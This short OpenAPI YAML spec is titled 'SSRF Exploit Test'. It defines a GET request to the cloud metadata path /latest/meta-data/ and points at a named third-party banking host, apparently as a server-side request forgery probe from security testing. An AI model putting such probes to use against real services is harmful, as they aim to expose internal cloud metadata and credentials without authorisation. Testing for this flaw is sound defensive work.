openapi: "3.0.0"
info:
  title: SSRF Exploit Test
  version: "1.0.0"
paths:
  /latest/meta-data/:
    get:
      summary: "Test SSRF by requesting internal metadata service"
      responses:
        '200':
          description: "Successfully fetched metadata"
        '404':
          description: "Could not fetch metadata"
servers:
  - url: "http://au-cdrbanking-pub.wise.com"
